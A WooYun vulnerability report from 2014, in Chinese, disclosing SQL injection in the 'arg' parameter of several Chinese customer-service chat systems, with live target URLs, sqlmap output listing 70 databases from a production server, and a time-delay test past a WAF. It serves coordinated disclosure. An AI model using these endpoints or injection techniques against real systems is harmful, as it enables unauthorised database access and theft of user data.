当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-048322

漏洞标题:国内多个知名客服系统疑似存在通用sql注入

相关厂商:cncert国家互联网应急中心

漏洞作者: 绝情刀

提交时间:2014-01-09 11:15

修复时间:2014-02-23 11:16

公开时间:2014-02-23 11:16

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-01-09: 细节已通知厂商并且等待厂商处理中
2014-01-14: 厂商已经确认,细节仅向厂商公开
2014-01-24: 细节向核心白帽子及相关领域专家公开
2014-02-03: 细节向普通白帽子公开
2014-02-13: 细节向实习白帽子公开
2014-02-23: 细节向公众公开

简要描述:

做人要学会举一反三。53kf你们的database又躺枪了!--

详细说明:

前几天提交了一个不知道名字的kf系统sql注入。 WooYun: 某未知kf系统注入导致数十万用户信息泄露 。当时扫描过c段,记得有53kf等网站。然后我当时就感觉有问题啊。那个参数是不是通用的存在sql注入捏?于是开始测试。
1、南天客服系统。http://kf.1000kf.com/company.php?arg=1000kf发现参数arg存在sql注入

QQ图片20140108203048.jpg


2、168kf系统。http://im1.168kf.com/webCompany.php?arg=168kf也是arg参数有sql注入
上面这两个都是可以注入出来的。都是拿官网测的试

QQ图片20140108202823.jpg


available databases [70]:                                                      
[*] 13jian
[*] 53kfbbs
[*] 53kfcs
[*] bak
[*] crm
[*] cus
[*] entalk
[*] hk_kf
[*] hk_kf1
[*] hk_talk
[*] hlm
[*] income
[*] information_schema
[*] ip
[*] ip2
[*] ip_110711
[*] ip_src
[*] kf
[*] kf1
[*] mail
[*] mail2
[*] mysql
[*] nanzhuang
[*] newoa
[*] newoa_bak
[*] oem
[*] oem_168kf_kf
[*] oem_168kf_kf1
[*] oem_168kf_talk
[*] oem_del
[*] oem_ekt_kf
[*] oem_ekt_kf1
[*] oem_ekt_talk
[*] oem_old
[*] oem_test
[*] oem_tzchat_kf
[*] oem_tzchat_kf1
[*] oem_tzchat_kf1_new
[*] oem_tzchat_kf_new
[*] oem_tzchat_talk
[*] oem_tzchat_talk_new
[*] oem_wb_kf
[*] oem_wb_kf1
[*] oem_wb_talk
[*] oem_yitian_kf
[*] oem_yitian_kf1
[*] oem_yitian_kf1_new
[*] oem_yitian_kf_new
[*] oem_yitian_talk
[*] oem_yitian_talk_new
[*] oem_ywdj_kf
[*] oem_ywdj_kf1
[*] oem_ywdj_talk
[*] sell
[*] sell2
[*] software
[*] srv_kf
[*] srv_kf1
[*] srv_talk
[*] stat
[*] talk
[*] talk34
[*] test
[*] tuiguang_53kf
[*] tuiguang_53kf_bak
[*] tw
[*] tw1
[*] twtalk
[*] ut
[*] ut1


53kf你们的rank给这么高多么的想给你们啊(又看见了你们的db躺枪)。。。

漏洞证明:

下面开始瞎讲:既然我说了通用还是有点依据的。就拿53kf这个我认为最大的开鲁。从53kf的首页过来

QQ图片20140108203600.jpg


本来想着直接sqlmap跑的,但是貌似有waf的。反正union和select这些关键词被过滤了。但是还是可以小小的证明下确实可以执行sql语句。

QQ图片20140108204156.jpg

QQ图片20140108204321.jpg


看着上面转的圈圈。确实延时了5秒!然后才返回错误,可见语句确实被执行了!其他的有限制的都尝试过,语句都被执行了,保证漏洞严谨性。
怪我才疏学浅,手工能力差,无法继续下去。搞点数据出来。但是如果没有waf捏?

修复方案:

推测国内的kf系统的源码难道是一样的?因为躺枪的有53kf、168kf、南天kf...知名点的都来了。还有求管理帮忙修修改改。

版权声明:转载请注明来源 绝情刀@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-01-14 10:04

厂商回复:

CNVD确认并复现所述情况,根据多个实例测试结果,确认所述多个客服系统存在同源情况.rank 20

最新状态:

暂无